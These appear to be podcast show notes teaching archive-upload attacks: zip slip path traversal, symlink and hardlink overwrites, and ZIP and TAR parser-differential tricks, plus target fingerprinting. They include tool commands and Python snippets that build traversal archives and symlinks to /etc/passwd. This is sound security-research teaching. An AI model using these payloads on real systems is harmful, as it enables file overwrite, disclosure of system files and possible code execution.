[HackerNotes Ep. 132] Archive Testing Methodology with Mathias Karlsson

Justin is joined by Mathias Karlsson to discuss vulnerabilities associated with archives. They talk about his new tool, Archive Alchemist, and explore topics like the significance of Unicode paths, symlinks, and TAR.

Hacker TL;DR

  • Archive Alchemist was born from Mathias’ frustration with repeatedly looking up archive utility parameters for testing archive-based bugs. It streamlines testing by making it easier to list, add, remove, and extract files without referencing manual pages.

  • The 3 main archive-based attack vectors:

    • Path Traversal (classic "zip slip") using paths like "../" to extract files outside intended directories;

    • Link-Based Overwrites using symbolic or hard links to place files outside extraction paths, potentially leading to RCE;

    • Parser Differential Bugs that exploit inconsistencies between validation and extraction parsers: when one parser validates the archive and another extracts it, mismatches in filename interpretation can allow malicious files to bypass security checks.

  • ZIP filename inconsistencies: Central Directory Header, Local File Header, and Unicode Path inconsistencies create opportunities for parser differentials. Validation might check the CDH showing "file.json" while extraction uses the Unicode Path field containing "../../../../etc/passwd". Additional attack vectors include UTF-16 normalization/confusion (Java tools interpret these inconsistently), CRC mismatches (Windows Explorer vs PowerShell), NULL byte handling variations (some tools truncate while others replace with spaces), and "overlong UTF-8" encoding that conceals special characters like slashes by encoding them as multi-byte sequences.

  • Path length truncation: Linux has a typical max path of 4096 characters, and most programming languages raise errors beyond this limit. Tools like "unzip" silently truncate filenames instead, allowing us to craft archives with long fake paths that drop malicious files like ".exe" at the end after truncation. This technique can also be weaponised as an information leak: progressively shorten the path until the errors stop, and the number of characters removed tells you the extraction path's length, revealing the server's directory structure bit by bit.

  • System fingerprinting: Uploading files named “CON”, “NUL”, or “<>” identifies Windows systems when they break (CON and NUL are reserved device names on Windows, and < and > are invalid filename characters there); path truncation at 4096 characters indicates Linux, while 260 suggests Windows. Symlink testing can reveal whether a target system supports symlinks: first establish a baseline with normal files, then test symlinks to normal files, and finally try symlinks to sensitive paths like “/etc/passwd”. 7zip has a unique quirk where it uses the archive's filename when extracting entries with empty filenames.

Archive Alchemist: Archive-based Vulnerabilities

This episode of the Critical Thinking podcast features Mathias Karlsson (his third appearance after episodes 50 and 68) discussing his new tool, Archive Alchemist, and various archive-based security vulnerabilities.

Why Archive Alchemist Was Created

Mathias explained that he created Archive Alchemist after repeatedly dealing with archive-related bugs that required custom archive creation. Even though archive-related bugs are very old, testing for them was a pain, so the tool was born out of frustration with constantly having to look up archive utility parameters and commands. His goals were to:

  • Make testing for archive-based vulnerabilities faster

  • Make it easier to list, add, remove and extract files

  • Eliminate the need to constantly reference manual pages for zip/unzip utilities

Justin added that it’s really important to have tools like this that help you build patterns, not only for yourself but also for your testing. One of the biggest differences between hackers who find a ton of bugs and the ones who find a few bugs here and there is that the former see patterns in the application.

An example: you find a bug somewhere, and then you think about that bug and start seeing patterns in the development of that specific application. “If this bug exists, maybe they think about developing such features this way, and this development pattern might also lead to these types of bugs.”

Archive-Based Attacks

For Mathias, there are mainly three types of archive-based attacks:

  • Path Traversal

    Using paths like ../ inside the archive to make the server extract files outside the intended directory. This is the classic “zip slip” issue, though it predates that name.

  • Link-Based Overwrites

    Using symbolic links (or hard links, in the case of TAR) inside the archive to overwrite or place files outside the extraction path. This can potentially lead to things like RCE, depending on where the links point and what gets written.

  • Parser Differential Bugs

    When one parser (or library) validates the archive and another one extracts it, and they don’t agree on things like filenames or entry structure. This mismatch can let malicious files bypass validation and still get extracted.
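As a quick illustration of the first vector, here is a minimal sketch (using Python's standard zipfile module rather than Archive Alchemist) showing that a traversal name can be written into an archive unchallenged:

```python
import io
import zipfile

# zipfile performs no sanitisation on write, so a traversal
# name goes straight into the archive.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("../../../../tmp/evil.txt", "pwned")

zf = zipfile.ZipFile(io.BytesIO(buf.getvalue()))
print(zf.namelist())  # ['../../../../tmp/evil.txt']
```

Note that Python's own extractall() strips the .. components on extraction; the bug bites extractors that join entry names onto a target directory without sanitising them first.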

How Archive Alchemist Works

The tool currently supports .tar, .zip and .tar.gz and offers simple commands to interact with and manipulate archives:

# Basic operations
aral example.zip ls
aral example.zip cat file.txt
aral example.zip replace example.json --symlink /etc/passwd

# Suggested work setup
aral original.zip replace --content-directory workdir/

# Example of attack payloads
aral original.zip add ../../../../../../etc/passwd
aral original.zip add file.json --symlink /etc/passwd
aral original.zip add file.json --unicodepath evil.php --content="evil code"

Archive Formats & Exploitation

Mathias walks through the internal structure of ZIP and TAR formats to show how archive bugs work and why they’re still relevant. Many of these bugs come from how different tools parse archives and how filenames are stored - especially when validation and extraction don’t rely on the same parser.

ZIP Internals and Exploitable Behaviours

ZIP files are parsed by first locating the End of Central Directory Header (EOCDH), which points to the Central Directory - a list of entries describing all files in the archive. Each entry has a Central Directory Header (CDH) with metadata like filename, compression method, and offsets. To extract a file, the parser follows that offset to find the Local File Header (LFH) and reads the file data.
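The lookup chain described above can be walked by hand. Here's a sketch using Python's struct module and the fixed offsets from the ZIP specification (EOCDH signature PK\x05\x06, CDH signature PK\x01\x02, LFH signature PK\x03\x04):

```python
import io
import struct
import zipfile

# Build a small archive to dissect.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("file.json", "{}")
data = buf.getvalue()

# 1. Find the End of Central Directory record, scanning from the
#    end because an archive comment may follow it.
eocd = data.rfind(b"PK\x05\x06")
cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)

# 2. The Central Directory Header holds the metadata, including the
#    offset of the Local File Header (at byte 42 of the CDH).
assert data[cd_offset : cd_offset + 4] == b"PK\x01\x02"
lfh_offset = struct.unpack_from("<I", data, cd_offset + 42)[0]

# 3. Follow that offset to the Local File Header and read the name
#    the CDH advertises (filename length lives at CDH byte 28).
assert data[lfh_offset : lfh_offset + 4] == b"PK\x03\x04"
name_len = struct.unpack_from("<H", data, cd_offset + 28)[0]
print(data[cd_offset + 46 : cd_offset + 46 + name_len])  # b'file.json'
```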

Filenames can appear in three different places:

  • In the CDH (filename field)

  • In the LFH (filename field)

  • In the Unicode Path extra field (inside the CDH and LFH)

This gives attackers room to craft mismatches. For example, the CDH might list file.json, but the LFH or Unicode Path could say ../../../../etc/passwd. If validation only checks the CDH but extraction relies on the LFH or Unicode field, you’ve got a parser differential - and possibly an overwrite.
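To see how little keeps the two name fields in sync, here's a sketch that builds a normal ZIP with Python's zipfile and then patches the LFH filename to a different string of the same length (same length, so the offsets recorded in the Central Directory stay valid):

```python
import io
import zipfile

# Build a normal ZIP containing "file.json".
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("file.json", '{"ok": true}')
data = bytearray(buf.getvalue())

# The Local File Header starts with PK\x03\x04; its filename field
# sits at offset 30 within it. Patch it to a same-length name.
lfh = data.index(b"PK\x03\x04")
assert data[lfh + 30 : lfh + 39] == b"file.json"
data[lfh + 30 : lfh + 39] = b"evil.json"

patched = zipfile.ZipFile(io.BytesIO(bytes(data)))
print(patched.namelist())  # Central Directory still says ['file.json']

# Python's zipfile happens to cross-check the two fields and
# refuses to extract; a parser that trusts only one of them
# would silently use whichever name it prefers.
try:
    patched.read("file.json")
    detected = False
except zipfile.BadZipFile:
    detected = True
print("mismatch detected:", detected)
```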

Mathias shares a few examples:

  • Two ZIP entries with the same name can confuse extractors. Some tools validate entry names during iteration, but use extractall() later - which may extract the second entry instead of the first. That’s enough to bypass naive validation logic.

  • Java tooling is inconsistent: java.util.zip and org.apache.commons.compress.archivers.zip don’t treat Unicode paths the same way, which leads to cases where validation and extraction operate on completely different filenames.

  • CRC mismatches in the Unicode Path field behave differently depending on the unzipper. Windows File Explorer will still use the Unicode path even if the CRC is invalid. PowerShell, on the other hand, rejects it. Same file, different results depending on the tool.

  • NULL byte handling also varies. Tools like 7z, unzip, and Python truncate filenames at the first NULL byte. PHP, on the other hand, replaces it with a space (0x20), potentially producing different outputs from the same archive.

  • Continuation bytes are part of UTF-8's multi-byte sequence representation of characters. In UTF-8 encoding:

    • The first bit in a byte determines if it's a single-byte character (if it's 0)

    • For multi-byte sequences, the first byte starts with specific bit patterns (110 for two bytes, 1110 for three bytes, etc.)

    • Continuation bytes always start with the pattern "10" followed by six more bits

      • The "overlong UTF-8" exploit: simple ASCII characters (like 'A') can be represented using multiple bytes instead of just one, and some unzip tools will normalise these overlong sequences back to their one-byte forms - for example, unzip on Linux when the LANG environment variable specifies no explicit encoding. This lets us hide special characters like slashes (/) in filenames by encoding them as multi-byte sequences. Validation might miss these, but they get properly interpreted during extraction - great for path traversal attacks.

  • Path length truncation: on Linux, the typical max path length is 4096 characters. Most programming languages will raise an error if you go beyond that. But unzip does something different: it just silently truncates the filename. So you can craft an archive with a long fake path ending in something like .exe or evil.sh, and unzip will happily extract just that, discarding the prefix. It’s an easy way to bypass filters that rely on checking full paths or extensions.

    • You can also use this behaviour to work out how long the extraction path is, and from that guess the exact path. Make the filename 4096 characters and keep shortening it until the error stops; the number of characters you subtracted tells you how long the base path was.

  • 7zip and empty filenames: when an archive contains an entry with an empty (zero-length) filename, most parsers will reject it as invalid or treat it as the current working directory. 7zip, however, uses the archive's own filename as the extracted filename. If you have ctbb.zip with an empty-named entry, 7zip will extract it as ctbb.

  • Testing symlinks: establish a baseline by testing a normal file (e.g., "filename") to observe proper behaviour. Then create a test where a file named "hello" is a symlink to "filename"; if this gives the same results as the baseline, symlinks might be supported. Finally, test a third case where the symlink points to something that should fail (e.g., "/etc/passwd"). If the third case fails while the second works, you can deduce that the system supports symlinks. Combined with the path length truncation trick, you can also work out how long the current path is and guess it from its length - gathering information bit by bit until it adds up to a lot.
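The duplicate-entry case from the list above is easy to reproduce with Python's zipfile: iteration sees both entries, but name-based lookups resolve to the later one.

```python
import io
import zipfile

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("a.txt", "first")   # the entry a validator might approve
    zf.writestr("a.txt", "second")  # the entry that actually wins

zf = zipfile.ZipFile(io.BytesIO(buf.getvalue()))
print(zf.namelist())     # ['a.txt', 'a.txt'] - iteration sees both
print(zf.read("a.txt"))  # b'second' - lookup resolves to the later entry
```

(writestr warns about the duplicate name, but writes it anyway.)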
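And the overlong-UTF-8 trick in byte form: '/' is code point 0x2F, normally the single byte 2F, but the same seven bits also fit into a two-byte 110xxxxx 10xxxxxx sequence that strict decoders must reject.

```python
# Pack '/' (0x2F) into an overlong two-byte UTF-8 sequence.
cp = ord("/")
overlong = bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
print(overlong.hex())  # c0af

# A strict UTF-8 decoder (Python's, here) refuses the sequence...
try:
    overlong.decode("utf-8")
    rejected = False
except UnicodeDecodeError:
    rejected = True

# ...but a lenient normaliser that only masks the marker bits
# recovers the hidden slash.
decoded = chr(((overlong[0] & 0x1F) << 6) | (overlong[1] & 0x3F))
print(decoded)  # '/'
```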

Note from Mathias:

  • “I have seen one time an app where FILENAME => symlink => TARGET did not work but FILENAME => symlink => symlink => TARGET did work (multiple symlink "hops")”

  • “I have seen apps that normalize \\ to / after "path traversal check/normalization" is done (so ../ does not work, but ..\\ does)”

TAR Internals and Behaviours

TAR files are simpler and don’t have a central directory. They’re parsed sequentially: each entry starts with a 512-byte header block, followed by the file content. This continues until the end of the archive.

TAR filenames can come from:

  • The filename field in the header

  • A combination of prefix + filename

  • A special @LongLink file (GNU TAR), where the long filename is in the file data, followed by the real file

  • A special @PaxHeaders.X/ entry (POSIX TAR), where the metadata contains path=... for the next file

As with ZIPs, different TAR parsers treat these fields differently. Some understand @LongLink but ignore @PaxHeaders. Some tools get tripped up when two entries have the same name. Any mismatch between validation and extraction logic creates an opening for confusion bugs.
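Python's tarfile happily writes both of the classic malicious member types, which makes it handy for generating TAR test cases by hand (a sketch; note that newer Python versions ship extraction filters that can block such members on the extracting side):

```python
import io
import tarfile

buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tf:
    # A member whose name climbs out of the extraction directory.
    data = b"owned"
    info = tarfile.TarInfo(name="../../escape.txt")
    info.size = len(data)
    tf.addfile(info, io.BytesIO(data))

    # A symlink member pointing at an absolute path.
    link = tarfile.TarInfo(name="passwd-link")
    link.type = tarfile.SYMTYPE
    link.linkname = "/etc/passwd"
    tf.addfile(link)

members = tarfile.open(fileobj=io.BytesIO(buf.getvalue())).getmembers()
for m in members:
    print(m.name, "->", m.linkname if m.issym() else "(regular file)")
```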

Payloads, Tooling, and Examples

Mathias built Archive Alchemist to simplify archive testing. Instead of writing payloads by hand or dealing with weird CLI flags, you can use simple one-liners like:

aral example.zip ls
aral example.zip cat file.txt
aral example.zip replace example.json --symlink /etc/passwd
aral original.zip replace --content-directory workdir/
aral original.zip add ../../../../../../etc/passwd
aral original.zip add file.json --symlink /etc/passwd
aral original.zip add file.json --unicodepath evil.php --content="evil code"

This makes it fast to test a range of archive bugs:

  • Path Traversals: Escape the target directory using ../ chains and write files where you shouldn't.

  • Symlink Injection: Insert a symlink to overwrite sensitive paths (like /etc/passwd) during extraction.

  • Hardlink Abuse (TAR only): Use TAR’s hardlink feature to point to existing files and overwrite or expose them.

  • Unicode & Encoding Confusion: Break validation using null bytes, overlong UTF-8 sequences, or invalid normalisation.

  • Parser Differential Abuse: Exploit tools that validate using one parser and extract using another, crafting mismatched file entries that bypass checks.

He also shares a few tricks for fingerprinting the target system:

  • Upload files like CON, NUL, or <>. If they break things, you’re probably on Windows (reserved device names and invalid filename characters). If not, it’s likely Linux.

  • If path truncation happens at 4096 characters, it’s probably Linux. If it happens at 260, it’s probably Windows.

  • By gradually shrinking paths until they stop breaking, you can work out the length of the base path used during extraction.
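These probes can all be packed into one archive. A minimal sketch with Python's zipfile (the probe names are illustrative, not from the episode):

```python
import io
import zipfile

# One probe archive, three fingerprinting signals: a Windows
# reserved device name, characters Windows forbids in filenames,
# and a single component longer than Linux's usual 255-byte NAME_MAX.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("CON", "reserved-name probe")
    zf.writestr("a<b>.txt", "invalid-character probe")
    zf.writestr("a" * 300, "name-length probe")

probe = zipfile.ZipFile(io.BytesIO(buf.getvalue()))
print(probe.namelist())  # all three entries survive inside the archive
```

How the target reacts when extracting each entry (error, rename, silent drop) is what does the fingerprinting.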

That’s it for the week.

And as always, keep hacking!